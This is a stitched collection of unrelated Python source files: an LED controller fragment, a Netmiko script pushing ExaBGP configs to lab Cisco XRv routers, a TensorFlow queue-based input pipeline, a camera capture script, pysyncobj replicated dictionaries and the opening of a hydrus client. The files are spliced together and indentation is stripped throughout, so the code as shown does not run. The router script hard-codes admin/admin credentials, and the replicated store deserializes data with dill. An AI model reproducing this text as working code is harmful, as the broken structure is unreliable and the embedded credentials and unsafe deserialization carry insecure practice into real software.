# * random colors (maybe based on normalized 3d perlin noise and selection the nodes coordinates?)
# * custom gradients animations
# * custom colors sequences animations
# * "follow the ball" animation (may be quite difficult due to the delay between commands sent to the board and actual ball movement)
pass
# Updates dimensions of the led matrix
# Updates the led driver object only if the dimensions are changed
def update_settings(self, settings):
self.stop()
# TODO convert setting to a dotmap?
dims = (settings["leds"]["width"]["value"], settings["leds"]["height"]["value"])
if self.dimensions != dims:
self.dimensions = dims
self.driver = LedsDriver(self.dimensions)
self.leds_type = None
self.pin = None
if (self.leds_type != settings["leds"]["type"]["value"]) or (self.pin != settings["leds"]["pin1"]["value"]):
self.pin = settings["leds"]["pin1"]["value"]
self.leds_type = settings["leds"]["type"]["value"]
is_ok = False
if self.leds_type == "WS2812B":
is_ok = self.driver.use_WS2812B(self.pin)
elif self.leds_type == "Dimmable":
is_ok = self.driver.use_dimmable(self.pin)
if not is_ok:
self.driver = None
self.app.semits.show_toast_on_UI("Led driver type not compatible with current HW")
self.app.logger.error("Cannot initialize leds controller")
self.start()
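# Illustrative usage (not part of the original module). `app` is assumed to be
# the server's application object (it must expose .logger and .semits), and a
# supported LED type must be configured in the settings for output to appear:
#
#     leds = LedsController(app)
#     leds.set_color((255, 0, 0))  # queue a solid red fill for the worker thread
#     ...
#     leds.stop()                  # let the thread exit and deinit the driver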
|
setexabgp.py
|
from threading import Thread
from jinja2 import Template
from netmiko import ConnectHandler
from glob import glob
import yaml
devices_info = [
{"hostname": "xrv1", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.101"},
{"hostname": "xrv2", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.102"},
{"hostname": "xrv3", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.103"},
{"hostname": "xrv4", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.104"},
{"hostname": "xrv5", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.105"},
{"hostname": "xrv6", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.106"},
{"hostname": "xrv7", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.107"},
{"hostname": "xrv8", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.108"},
{"hostname": "xrv9", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.109"},
{"hostname": "xrv10", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.110"},
{"hostname": "xrv11", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.111"},
{"hostname": "xrv12", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.112"},
{"hostname": "xrv13", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.113"},
{"hostname": "xrv14", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.114"},
{"hostname": "xrv15", "port": 22, "username": "admin", "password":"admin","device_type":"cisco_xr","ip":"172.20.3.115"},
]
def get_config(hostname, temp_type):
temp_path="../config_template/"
if "xrv" in hostname:
device_type = "xrv"
elif "IOS" in hostname:
device_type = "vios"
template_file = glob(temp_path + device_type + "_" + temp_type + "*")
template = Template(open(template_file[0]).read())
data_path = "../data/"
data_file = glob(data_path + temp_type + "/" + hostname + "_*" )
    data = yaml.safe_load(open(data_file[0]).read())
if hostname.startswith("xrv"):
return template.render(**data,commit=True)
elif hostname.startswith("vIOS"):
return template.render(**data)
def set_config(device):
cfgs = get_config(device.get("hostname"), "exabgp")
print(cfgs)
del device["hostname"]
net_connect = ConnectHandler(**device)
net_connect.send_config_set(cfgs)
if __name__ == '__main__':
tasks = []
for device in devices_info:
task = Thread(target=set_config, args=(device,))
task.start()
tasks.append(task)
for task in tasks:
task.join()
|
inputs.py
|
"""
Input pipeline utilities: queue-based feeders and data generators.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
import threading, multiprocessing
from collections import OrderedDict
DTYPE_DICT = {'int32': tf.int32, 'int64': tf.int64, 'float32': tf.float32, 'float64': tf.float32}
class PythonFeeder(object):
"""
    This class manages the background threads needed to fill
    a queue with data.
"""
def __init__(self, dataset, batch_size=256, n_feeders=2, queue=tf.RandomShuffleQueue):
if isinstance(dataset, (list, tuple)) and len(dataset) == 2:
dataset = CompleteDataGenerator(dataset[0], dataset[1], shuffle=True, batch_size=batch_size)
self.dataset = dataset
self.batch_size = batch_size
self.n_threads = n_feeders
self.num_samples = dataset.num_samples()
self.input_info = dataset.input_info()
self.target_info = dataset.target_info()
self._stop = False
self.feeders = []
self.queue = queue
self.inputs = None
self.targets = None
self.enqueue_op = None
def request_stop(self):
self.queue.close(cancel_pending_enqueues=True)
self._stop = True
def join(self):
import time
while all([not f.isAlive() for f in self.feeders]):
time.sleep(0.1)
def build_batch(self):
"""
        Returns tensors containing a batch of images and labels.
"""
# Data Queue
min_after_dequeue = 20 * self.batch_size
capacity = min_after_dequeue + 5 * self.batch_size
names = self.input_info.keys() + self.target_info.keys()
shapes = [val['shape'] for _, val in self.input_info.iteritems()] + \
[val['shape'] for _, val in self.target_info.iteritems()]
dtypes = [DTYPE_DICT[val['dtype']] for _, val in self.input_info.iteritems()] + \
[DTYPE_DICT[val['dtype']] for _, val in self.target_info.iteritems()]
if self.queue is tf.RandomShuffleQueue:
self.queue = self.queue(names=names, shapes=shapes, dtypes=dtypes, capacity=capacity, min_after_dequeue=min_after_dequeue)
elif self.queue is tf.FIFOQueue:
self.queue = self.queue(names=names, shapes=shapes, dtypes=dtypes, capacity=capacity)
else:
raise ValueError('Unknown queue type.')
# Placeholders for feeding the queue
self.inputs = OrderedDict(
[(key, tf.placeholder(dtype=DTYPE_DICT[val['dtype']],
shape=(None,)+val['shape'],
name=key))
for key, val in self.input_info.iteritems()]
)
self.targets = OrderedDict(
[(key, tf.placeholder(dtype=DTYPE_DICT[val['dtype']],
shape=(None,)+val['shape'],
name=key))
for key, val in self.target_info.iteritems()]
)
# The symbolic operation to add datalib to the queue
enqueue_dict = dict(self.inputs.items() + self.targets.items())
self.enqueue_op = self.queue.enqueue_many(enqueue_dict)
samples = self.queue.dequeue_many(self.batch_size)
inputs = [samples[key] for key in self.input_info.keys()]
targets = [samples[key] for key in self.target_info.keys()]
return inputs, targets
def main_feed(self, sess, n):
"""
        Function run on an alternate thread. Basically, keep adding data to the queue.
"""
# import time
try:
feed_dict = {}
feed_dict.update({self.inputs[key]: None for key in self.input_info.keys()})
feed_dict.update({self.targets[key]: None for key in self.target_info.keys()})
# i = 1
# t0 = t1 = time.time()
for j, (inputs_, targets_) in enumerate(self.dataset.batch_loop()):
# t1_iter = time.time()-t1
#
# t2 = time.time()
if inputs_ is None:
break
if self._stop:
print('Stop requested. Feeder %d for queue (%s) will close...' % (n, type(self.queue).__name__))
return
for key in self.input_info.keys():
feed_dict[self.inputs[key]] = inputs_[key]
for key in self.target_info.keys():
feed_dict[self.targets[key]] = targets_[key]
# t2_iter = time.time()-t2
#
# t3 = time.time()
sess.run(self.enqueue_op, feed_dict=feed_dict)
# t3_iter = time.time()-t3
#
# if j<5:
# t0 = t1 = time.time()
# continue
#
# print('Thread %d' % n, i, feed_dict[self.targets['answer']].shape[0]*i/(time.time()-t0), t1_iter, t2_iter, t3_iter, [feed_dict[key].shape for key in feed_dict.keys()])
# i += 1
#
# t1 = time.time()
except tf.errors.CancelledError:
print('TF queue is closed. Feeder %d for queue (%s) will close...' % (n, type(self.queue).__name__))
return
def start_feeder(self, sess):
""" Start background threads to feed queue """
self.dataset.start_feeder()
self._stop = False
threads = []
for n in xrange(self.n_threads):
thread = threading.Thread(target=self.main_feed, args=(sess, n))
thread.daemon = True
thread.start()
threads.append(thread)
self.feeders = threads
class TFFeeder(object):
"""
    This class manages the background threads needed to fill
    a queue with data.
"""
def __init__(self, dataset, batch_size=256, n_feeders=2, n_dequeue=1, shuffle=True):
self.dataset = dataset
self.batch_size = batch_size
self.n_feeders = n_feeders
self.shuffle = shuffle
self.num_samples = dataset.num_samples()
self.n_dequeue = n_dequeue
def build_batch(self, min_after_dequeue=5, capacity=3, num_epochs=None, gpu_id=0):
with tf.device('/cpu:0'):
dataset, batch_size, n_feeders, shuffle = self.dataset, self.batch_size, self.n_feeders, self.shuffle
input_info = dataset.input_info()
target_info = dataset.target_info()
filename_queue = tf.train.string_input_producer(dataset.tfrecords_fns(), shuffle=shuffle, num_epochs=num_epochs)
dequeue_size = 1./(np.arange(self.n_dequeue, dtype=float)+3)
dequeue_size = np.ceil(dequeue_size/dequeue_size.sum()*batch_size).astype(int)
dequeue_size[0] = batch_size - dequeue_size[1:].sum() # CPU->GPU copy is not parelelized. By having smaller dequeue, CPU->GPU copies can start sooner.
inputs_batch, targets_batch = [None]*self.n_dequeue, [None]*self.n_dequeue
for i in range(self.n_dequeue):
min_after_dequeue = min_after_dequeue * dequeue_size[i]
capacity = min_after_dequeue + capacity * dequeue_size[i]
if shuffle and n_feeders == 1: batch_fnc = lambda x: tf.train.shuffle_batch(x, dequeue_size[i], capacity, min_after_dequeue)
elif shuffle and n_feeders > 1: batch_fnc = lambda x: tf.train.shuffle_batch_join(x, dequeue_size[i], capacity, min_after_dequeue)
elif not shuffle and n_feeders == 1: batch_fnc = lambda x: tf.train.batch(x, dequeue_size[i], capacity)
elif not shuffle and n_feeders > 1: batch_fnc = lambda x: tf.train.batch_join(x, dequeue_size[i], capacity)
tensors = []
for _ in range(n_feeders):
reader = tf.TFRecordReader()
_, record_serialized = reader.read(filename_queue)
inputs, targets = dataset.parse_and_prep_record(record_serialized)
tensors.append(dict([(key, inputs[key]) for key in input_info.keys()] +
[(key, targets[key]) for key in target_info.keys()]))
if n_feeders == 1:
tensors = tensors[0]
tensors_batch = batch_fnc(tensors)
inputs_batch[i] = [tensors_batch[key] for key in input_info.keys()]
targets_batch[i] = [tensors_batch[key] for key in target_info.keys()]
with tf.device(gpu_id):
if self.n_dequeue>1:
inputs_batch = [tf.concat(0, inps) for inps in zip(*inputs_batch)]
targets_batch = [tf.concat(0, trgts) for trgts in zip(*targets_batch)]
else:
inputs_batch = inputs_batch[0]
targets_batch = targets_batch[0]
return inputs_batch, targets_batch
def request_stop(self):
pass
def join(self):
pass
def start_feeder(self, sess):
pass
class Dataset(object):
def __init__(self, init=True):
if init:
self._input_info = OrderedDict()
self._target_info = OrderedDict()
self.n_samples = None
def input_info(self):
return self._input_info.copy()
def target_info(self):
return self._target_info.copy()
def num_samples(self):
assert self.n_samples is not None, 'Dataset has to define self.n_samples'
return self.n_samples
def add_input(self, name, dtype='float32', shape=()):
assert name not in self._input_info.keys() + self._target_info.keys()
self._input_info[name] = {'dtype': dtype, 'shape': shape}
def add_target(self, name, dtype='int32', shape=()):
assert name not in self._input_info.keys() + self._target_info.keys()
self._target_info[name] = {'dtype': dtype, 'shape': shape}
class DataGenerator(Dataset):
"""
This class provides a template for the loaders used with TFFeeder
"""
def __init__(self, shuffle, batch_size=64, reinit_dataset=True):
Dataset.__init__(self, init=reinit_dataset)
self.shuffle = shuffle
self.batch_size = batch_size
def start_feeder(self):
# Do nothing
pass
def loop(self):
raise NotImplementedError
def batch_loop(self):
raise NotImplementedError
def get_sample(self, index):
raise NotImplementedError
class CompleteDataGenerator(DataGenerator):
"""
Instance of DataGenerator for complete datasets
(i.e. that can be completely loaded into numpy arrays)
"""
def __init__(self, inputs, targets, shuffle=True, batch_size=64):
DataGenerator.__init__(self, shuffle, batch_size)
if isinstance(inputs, np.ndarray):
inputs = [inputs]
if isinstance(inputs, list):
inputs = {'X:%d' % i: inputs[i] for i in xrange(len(inputs))}
if isinstance(targets, np.ndarray):
targets = [targets]
if isinstance(targets, list):
targets = {'Y:%d' % i: targets[i] for i in xrange(len(targets))}
for key, val in inputs.iteritems():
self.add_input(key, val.dtype.name, tuple(val.shape[1:]))
for key, val in targets.iteritems():
self.add_target(key, val.dtype.name, tuple(val.shape[1:]))
self.inputs = inputs
self.targets = targets
self.n_samples = self.inputs.values()[0].shape[0]
def loop(self):
from itertools import cycle
order = np.arange(self.n_samples)
if self.shuffle:
np.random.shuffle(order)
for item in cycle(order):
inputs = {key: val[item] for key, val in self.inputs.items()}
targets = {key: val[item] for key, val in self.targets.items()}
yield inputs, targets
def batch_loop(self):
from itertools import cycle
order = np.arange(self.n_samples)
if self.shuffle:
np.random.shuffle(order)
batch_lims = [(i, i+self.batch_size) for i in xrange(0, self.n_samples, self.batch_size)]
for lims in cycle(batch_lims):
inputs = {key: val[lims[0]:lims[1]] for key, val in self.inputs.items()}
targets = {key: val[lims[0]:lims[1]] for key, val in self.targets.items()}
yield inputs, targets
def get_sample(self, index):
inputs = {key: val[index] for key, val in self.inputs.items()}
targets = {key: val[index] for key, val in self.targets.items()}
return inputs, targets
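# Illustrative sketch (not part of the original module): wrapping in-memory
# numpy arrays with CompleteDataGenerator and pulling one batch. The shapes
# and dtypes below are arbitrary.
def _example_complete_generator():
    X = np.random.rand(256, 32).astype('float32')
    y = np.random.randint(0, 10, size=(256,)).astype('int32')
    gen = CompleteDataGenerator(X, y, shuffle=True, batch_size=64)
    inputs, targets = next(gen.batch_loop())
    # single unnamed arrays are exposed under the keys 'X:0' and 'Y:0'
    return inputs['X:0'].shape, targets['Y:0'].shape  # ((64, 32), (64,))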
class MultiProcessWrapper(DataGenerator):
"""
    A Python class that manages a donkey (worker pool) and a feeder thread to fetch data samples.
    Works as a wrapper around a DataGenerator.
"""
def __init__(self, dataset, n_donkey=4):
DataGenerator.__init__(self, dataset.shuffle, dataset.batch_size)
self.dataset = dataset
self.n_donkey = n_donkey
self.n_samples = dataset.num_samples()
self._input_info = dataset.input_info()
self._target_info = dataset.target_info()
self.donkey = Donkey(f=self.get_sample, n_proc=n_donkey)
self._feeder = None
def _random_ind_list(self):
if self.shuffle:
ind_list = np.random.permutation(self.n_samples)
else:
ind_list = xrange(self.n_samples)
return ind_list
def start_feeder(self, coord=None):
'''
        an infinite feeder that generates a new job list every epoch
        and then submits each job index to the donkeys
:return:
'''
def feed(coord=None):
while True:
self.ind_list = self._random_ind_list()
for ind in self.ind_list:
if coord is not None:
if coord.should_stop():
break
self.donkey.add_job((ind, ))
self._feeder = threading.Thread(target=feed, args=(coord,))
self._feeder.daemon = True
self._feeder.start()
return self._feeder
def loop(self):
'''
        an infinite loop that retrieves samples from the donkeys
'''
while True:
yield self.donkey.q_out.get()
def batch_loop(self):
'''
        an infinite loop that accumulates samples from loop() into batches
'''
inputs, targets, n = {}, {}, 0
for inp, trg in self.loop():
# Memory initialization
for key in self._input_info.keys():
if key not in inputs.keys():
inputs[key] = np.zeros((self.batch_size,)+inp[key].shape, dtype=inp[key].dtype)
inputs[key][n] = inp[key]
for key in self._target_info.keys():
if key not in targets.keys():
targets[key] = np.zeros((self.batch_size,)+trg[key].shape, dtype=trg[key].dtype)
targets[key][n] = trg[key]
n += 1
if n == self.batch_size:
yield inputs, targets
n = 0
def get_sample(self, idx):
return self.dataset.get_sample(idx)
# Auxiliary donkey function
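# Each worker loops forever: it takes an argument tuple from q_in, optionally prepends its
# per-worker var_dict, applies f, and puts the result on q_out. A None item is the poison pill
# that tells the worker to exit.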
def fun(f, var_dict, q_in, q_out, coord=None):
while True:
if coord is not None:
if coord.should_stop():
break
x = q_in.get()
if x is None:
break
if var_dict is not None:
if not isinstance(x, tuple):
x = (x, )
x = (var_dict, ) + x
res = f(*x)
q_out.put(res)
class Donkey(object):
def __init__(self, n_proc=8, f=None, var_dict=None):
self.q_in = multiprocessing.Queue(1)
self.q_out = multiprocessing.Queue(n_proc*25)
self.n_proc = n_proc
self.f = f
        assert var_dict is None or isinstance(var_dict, dict) or (isinstance(var_dict, (list, tuple)) and len(var_dict) == n_proc)
        if not isinstance(var_dict, (list, tuple)):
            self.var_dict = [var_dict for _ in range(n_proc)]
        else:
            self.var_dict = list(var_dict)
self.workers = [multiprocessing.Process(target=fun, args=(self.f, self.var_dict[i], self.q_in, self.q_out)) for i in xrange(n_proc)]
for p in self.workers:
p.daemon = True
p.start()
def add_job(self, args):
self.q_in.put(args)
def stop(self):
[self.q_in.put((None)) for _ in range(self.n_proc)]
[p.join() for p in self.workers]
def test_enqueue():
from datalib.daquar.TFDataGenerator import DaquarDtGen
import time
daquar = DaquarDtGen(full=True, single_answer=False, features={'cnn': 'VGG19', 'layer': 'fc7'}, train=True, batch_size=128)
#daquar = MultiProcessWrapper(dataset=daquar, n_donkey=8)
tf_feeder = PythonFeeder(dataset=daquar, batch_size=512, n_feeders=2, queue=tf.RandomShuffleQueue)
with tf.Session(config=tf.ConfigProto(intra_op_parallelism_threads=2, gpu_options=tf.GPUOptions(allow_growth=True))) as sess:
coord = tf.train.Coordinator()
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
tf_feeder.start_feeder(sess=sess)
a = 0
while True:
a += np.random.rand()
pass
tf_feeder.request_stop()
tf_feeder.join()
coord.request_stop()
coord.join(threads)
def test_donkey():
def do_job():
return np.zeros((1, 120, 1024))
import time
donkey = Donkey(10, do_job)
t1 = time.time()
for i in range(4):
t = time.time()
        donkey.add_job(())  # do_job takes no arguments, so submit an empty argument tuple
print('addjob', time.time()-t)
for i in range(4):
print(donkey.q_out.get().shape)
print(time.time()-t1)
if __name__ == '__main__':
# test_donkey()
test_enqueue()
# test_batcher()
|
imgacq.py
|
from simple_pyspin import Camera
import time
from PIL import Image
import os
from multiprocessing import Process
def image_capture(duration):
global fps
# duration = int(input('enter duration')) #dev purposes only
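    # The frame rate below looks hand-tuned per capture duration; presumably longer recordings
    # use a lower fps so the total number of saved frames stays manageable.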
    if 0 < duration <= 5:
        fps = 30
    elif 5 < duration <= 10:
        fps = 30
    elif 10 < duration <= 15:
        fps = 30
    elif 15 < duration <= 20:
        fps = 31
    elif 20 < duration <= 30:
        fps = 32
    elif duration > 30:
        fps = 25
print(fps)
num_frames = int(duration * fps)
# Make a directory to save some images
output_dir = 'test_images'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
with Camera() as cam:
# If this is a color camera, request the data in RGB format.
if 'Bayer' in cam.PixelFormat:
cam.PixelFormat = "RGB8"
# Get images from the full sensor
cam.OffsetX = 0
cam.OffsetY = 0
cam.Width = cam.SensorWidth
cam.Height = cam.SensorHeight
# cam.AcquisitionFrameRateAuto = 'Off'
# cam.AcquisitionFrameRateEnabled = True
# cam.AcquisitionFrameRate = 32
print('Opened camera: %s (#%s)' % (cam.DeviceModelName, cam.DeviceSerialNumber))
print('Recording...')
# Start recording
cam.start()
start = time.time()
# print(start)
for a in range(num_frames):
imgs = [cam.get_array() for n in range(1)]
for n, img in enumerate(imgs):
Image.fromarray(img).save(os.path.join(output_dir, '%08d.jpg' % a))
# Stop recording
el = time.time() - start
# print('el is', el)
cam.stop()
print('Acquired %d images in %.2f s (~ %.1f fps)' % (num_frames, el, num_frames / el))
# print('Acquired %d images in %.2f s (~ %.1f fps)' % (len(img), el, len(img) / el))
# Make a directory to save some images
# output_dir = 'test_images'
# if not os.path.exists(output_dir):
# os.makedirs(output_dir)
# print('Saving to "%s"' % output_dir)
# Save them
# for n, img in enumerate(imgs):
# Image.fromarray(img).save(os.path.join(output_dir, '%08d.jpg' % n))
return start
if __name__ == '__main__':
    # image_capture() needs a duration; prompt for it, as the commented-out dev line above suggests
    duration = int(input('Enter capture duration in seconds: '))
    p1 = Process(target=image_capture, args=(duration,))
    p1.start()
    p1.join()
|
batteries.py
|
from __future__ import print_function
import hashlib
import os
import socket
import threading
import time
import weakref
from collections.abc import Mapping
from typing import ValuesView, ItemsView
import dill
from pysyncobj import replicated, SyncObjConsumer
from pysyncobj.batteries import ReplDict
class ReplEventDict(ReplDict):
def __init__(self, on_set=None):
self.on_set = on_set
super(ReplEventDict, self).__init__()
@replicated
def set(self, key, value):
super().set(key, value, _doApply=True)
if self.on_set is not None:
self.on_set(key, value)
#
# Replicated Code Store with versioning
# ex usage:
# obj.inc_version()
# obj.set("/a", pickle.dumps(lambda: 1))
# obj.set("/b", pickle.dumps(lambda: 2))
# obj.commit()
# obj.inc_version()
# obj.set("/a", pickle.dumps(lambda: 3))
# obj.commit()
# v = obj.get("/a")
# v() expect ==> 3
# with obj:
# obj.set("/a", pickle.dumps(lambda: 1))
# obj.set("/b", pickle.dumps(lambda: 2))
#
# get:
# obj['/']
# obj.get("/")
# TODO: grab a lock for commit transaction otherwise a separate process can
class ReplVersionedDict(SyncObjConsumer, Mapping):
def __init__(self, on_head_change=None):
self.on_head_change = on_head_change
super(ReplVersionedDict, self).__init__()
self.__objects = {}
self.__references = {}
self.__version = None
self.__head = None
self.__len_cache = {}
def clear(self):
self.__objects = {}
self.__references = {}
self.__version = None
self.__head = None
self.__len_cache = {}
def __getitem__(self, k):
x = self.get(k)
if x is None:
raise KeyError(k)
return x
def __len__(self):
version = self.get_head()
if version in self.__len_cache:
return self.__len_cache[version]
x = sum([1 for arr in self.__references.values() if self.__floor_to_version(arr, version) is not None])
self.__len_cache[version] = x
return x
# https://docs.python.org/3/reference/datamodel.html#object.__iter__
def __iter__(self):
return self.keys()
# TODO: create ItemsView
def items(self) -> ItemsView:
version = self.get_head()
for key, arr in self.__references.items():
v = self.__floor_to_version(arr, version)
if v is not None:
yield key, self.__get_obj(v)
# TODO: create ValuesView
def values(self) -> ValuesView:
version = self.get_head()
for key, arr in self.__references.items():
v = self.__floor_to_version(arr, version)
if v is not None:
yield self.__get_obj(v)
def __contains__(self, o: object) -> bool:
return self.get(o) is not None
@replicated
def delete(self, key):
self.__delitem__(key, _doApply=True)
@replicated
def __delitem__(self, key):
# put a tombstone into the end of the array so that it's ignored in __floor_to_version
self.set(key, None, _doApply=True)
# https://stackoverflow.com/questions/42366856/keysview-valuesview-and-itemsview-default-representation-of-a-mapping-subclass
    # TODO: implement KeysView so it works over BaseManager
def keys(self, version=None):
        version = self.get_head() if version is None else version
all_keys = []
for key, arr in self.__references.items():
v = self.__floor_to_version(arr, version)
if v is not None:
all_keys.append(key)
return all_keys.__iter__()
@staticmethod
def __hash_obj(value):
m = hashlib.sha256()
m.update(value)
return m.digest()
def __store_obj(self, value):
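        # Content-addressed storage: the value is serialized with dill and keyed by the SHA-256
        # of its payload, so identical objects are stored only once across versions.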
data = dill.dumps(value)
key = self.__hash_obj(data)
self.__objects[key] = data
return key
def __get_obj(self, key):
obj = self.__objects.get(key)
return dill.loads(obj) if obj is not None else None
def __inc_version(self):
self.__version = 0 if self.__version is None else self.__version + 1
return self.__version
def get_max_version(self):
return self.__version
@replicated
def set_head(self, version=None):
if self.__version is None:
if version is not None:
# raise RuntimeError("no prior transactions")
return
else:
if version is None:
version = self.__version
self.__head = min(version, self.__version)
if self.on_head_change is not None:
self.on_head_change(self.__head)
def get_head(self):
return self.__version if self.__head is None else self.__head
@replicated
def update(self, other):
self.__inc_version()
for k in other:
self.__set(k, other[k])
self.set_head(version=None, _doApply=True)
@staticmethod
def __floor_to_version(arr, version):
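        # arr holds (version, object_key) pairs in ascending-version order; scanning from the end
        # returns the newest entry at or below the requested version, or None if the key did not
        # exist yet (a None object_key is a tombstone left by a delete).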
for i in reversed(range(len(arr))):
v = arr[i][0]
if v <= version:
return arr[i][1]
return None
def get(self, key):
version = self.get_head()
arr = self.__references.get(key)
if arr is not None:
v = self.__floor_to_version(arr, version)
if v is not None:
return self.__get_obj(v)
return None
def __set(self, key, value):
obj_key = self.__store_obj(value) if value is not None else None
arr = self.__references.get(key)
if arr is None:
arr = []
arr.append((self.__version, obj_key))
self.__references[key] = arr
@replicated
def set(self, key, value):
self.update({key: value}, _doApply=True)
@replicated
def flatten(self):
pass
class ReplTaskManager(SyncObjConsumer):
def __init__(self, kvstore, task_manager):
self.kvstore = kvstore
self.task_manager = task_manager
super(ReplTaskManager, self).__init__()
# TODO: we should provide another way to store results as replicated actions would all store into the same key
@replicated
def apply(self, src, *args, **kwargs):
return self.task_manager.apply(src, *args, **kwargs)
# Similar to _ReplLockManagerImpl but supports data bound to the lock
# TODO: can this be done with a lock and the dict?
class _ReplLockDataManagerImpl(SyncObjConsumer):
def __init__(self, autoUnlockTime):
super(_ReplLockDataManagerImpl, self).__init__()
self.__locks = {}
self.__autoUnlockTime = autoUnlockTime
@replicated
def acquire(self, lockID, clientID, currentTime, data=None):
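        # Each lock is stored as a (clientID, acquireTime, data) tuple; an entry older than
        # autoUnlockTime is treated as expired and may be re-acquired.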
existingLock = self.__locks.get(lockID, None)
# Auto-unlock old lock
if existingLock is not None:
if currentTime - existingLock[1] > self.__autoUnlockTime:
existingLock = None
# Acquire lock if possible
if existingLock is None or existingLock[0] == clientID:
self.__locks[lockID] = (clientID, currentTime, data)
return True
# Lock already acquired by someone else
return False
@replicated
def prolongate(self, clientID, currentTime):
for lockID in list(self.__locks):
lockClientID, lockTime, lockData = self.__locks[lockID]
if currentTime - lockTime > self.__autoUnlockTime:
del self.__locks[lockID]
continue
if lockClientID == clientID:
self.__locks[lockID] = (lockClientID, currentTime, lockData)
@replicated
def release(self, lockID, clientID):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None and existingLock[0] == clientID:
del self.__locks[lockID]
def isAcquired(self, lockID, clientID, currentTime):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None:
if existingLock[0] == clientID:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
def isOwned(self, lockID, currentTime):
existingLock = self.__locks.get(lockID, None)
if existingLock is not None:
if currentTime - existingLock[1] < self.__autoUnlockTime:
return True
return False
def lockData(self, lockID=None):
if lockID is None:
return {k: self.__locks[k][2] for k in self.__locks.keys()}
existingLock = self.__locks.get(lockID)
if existingLock is not None:
return {lockID: existingLock}
class ReplLockDataManager(object):
def __init__(self, autoUnlockTime, selfID=None):
"""Replicated Lock Manager. Allow to acquire / release distributed locks.
:param autoUnlockTime: lock will be released automatically
if no response from holder for more than autoUnlockTime seconds
:type autoUnlockTime: float
:param selfID: (optional) - unique id of current lock holder.
:type selfID: str
"""
self.__lockImpl = _ReplLockDataManagerImpl(autoUnlockTime)
if selfID is None:
selfID = '%s:%d:%d' % (socket.gethostname(), os.getpid(), id(self))
self.__selfID = selfID
self.__autoUnlockTime = autoUnlockTime
self.__mainThread = threading.current_thread()
self.__initialised = threading.Event()
self.__destroying = False
self.__lastProlongateTime = 0
self.__thread = threading.Thread(target=ReplLockDataManager._autoAcquireThread, args=(weakref.proxy(self),))
self.__thread.start()
while not self.__initialised.is_set():
pass
def _consumer(self):
return self.__lockImpl
def destroy(self):
"""Destroy should be called before destroying ReplLockManager"""
self.__destroying = True
def _autoAcquireThread(self):
self.__initialised.set()
try:
while True:
if not self.__mainThread.is_alive():
break
if self.__destroying:
break
time.sleep(0.1)
if time.time() - self.__lastProlongateTime < float(self.__autoUnlockTime) / 4.0:
continue
syncObj = self.__lockImpl._syncObj
if syncObj is None:
continue
if syncObj._getLeader() is not None:
self.__lastProlongateTime = time.time()
self.__lockImpl.prolongate(self.__selfID, time.time())
except ReferenceError:
pass
def tryAcquire(self, lockID, data=None, callback=None, sync=False, timeout=None):
"""Attempt to acquire lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is acquired or failed to acquire.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
:return True if acquired, False - somebody else already acquired lock
"""
attemptTime = time.time()
if sync:
acquireRes = self.__lockImpl.acquire(lockID, self.__selfID, attemptTime, data=data, callback=callback, sync=sync, timeout=timeout)
acquireTime = time.time()
if acquireRes:
if acquireTime - attemptTime > self.__autoUnlockTime / 2.0:
acquireRes = False
self.__lockImpl.release(lockID, self.__selfID, sync=sync)
return acquireRes
def asyncCallback(acquireRes, errCode):
if acquireRes:
acquireTime = time.time()
if acquireTime - attemptTime > self.__autoUnlockTime / 2.0:
acquireRes = False
self.__lockImpl.release(lockID, self.__selfID, sync=False)
callback(acquireRes, errCode)
self.__lockImpl.acquire(lockID, self.__selfID, attemptTime, callback=asyncCallback, sync=sync, timeout=timeout)
def isAcquired(self, lockID):
"""Check if lock is acquired by ourselves.
:param lockID: unique lock identifier.
:type lockID: str
:return True if lock is acquired by ourselves.
"""
return self.__lockImpl.isAcquired(lockID, self.__selfID, time.time())
def isOwned(self, lockID):
return self.__lockImpl.isOwned(lockID, time.time())
def lockData(self, lockID=None):
return self.__lockImpl.lockData(lockID=lockID)
def release(self, lockID, callback=None, sync=False, timeout=None):
"""
Release previously-acquired lock.
:param lockID: unique lock identifier.
:type lockID: str
:param sync: True - to wait until lock is released or failed to release.
:type sync: bool
:param callback: if sync is False - callback will be called with operation result.
:type callback: func(opResult, error)
:param timeout: max operation time (default - unlimited)
:type timeout: float
"""
self.__lockImpl.release(lockID, self.__selfID, callback=callback, sync=sync, timeout=timeout)
|
client.py
|
#!/usr/bin/env python2
# This program is free software. It comes without any warranty, to
# the extent permitted by applicable law. You can redistribute it
# and/or modify it under the terms of the Do What The Fuck You Want
# To Public License, Version 2, as published by Sam Hocevar. See
# http://sam.zoy.org/wtfpl/COPYING for more details.
try:
from include import HydrusExceptions
from include import HydrusConstants as HC
from include import HydrusData
from include import HydrusPaths
import os
import sys
import time
from include import ClientController
import threading
from include import HydrusGlobals as HG
from include import HydrusLogger
import traceback
try:
from twisted.internet import reactor
except:
HG.twisted_is_broke = True
#
import argparse
argparser = argparse.ArgumentParser( description = 'hydrus network client (console)' )
argparser.add_argument( '-d', '--db_dir', help = 'set an external db location' )
argparser.add_argument( '--no_daemons', action='store_true', help = 'run without background daemons' )
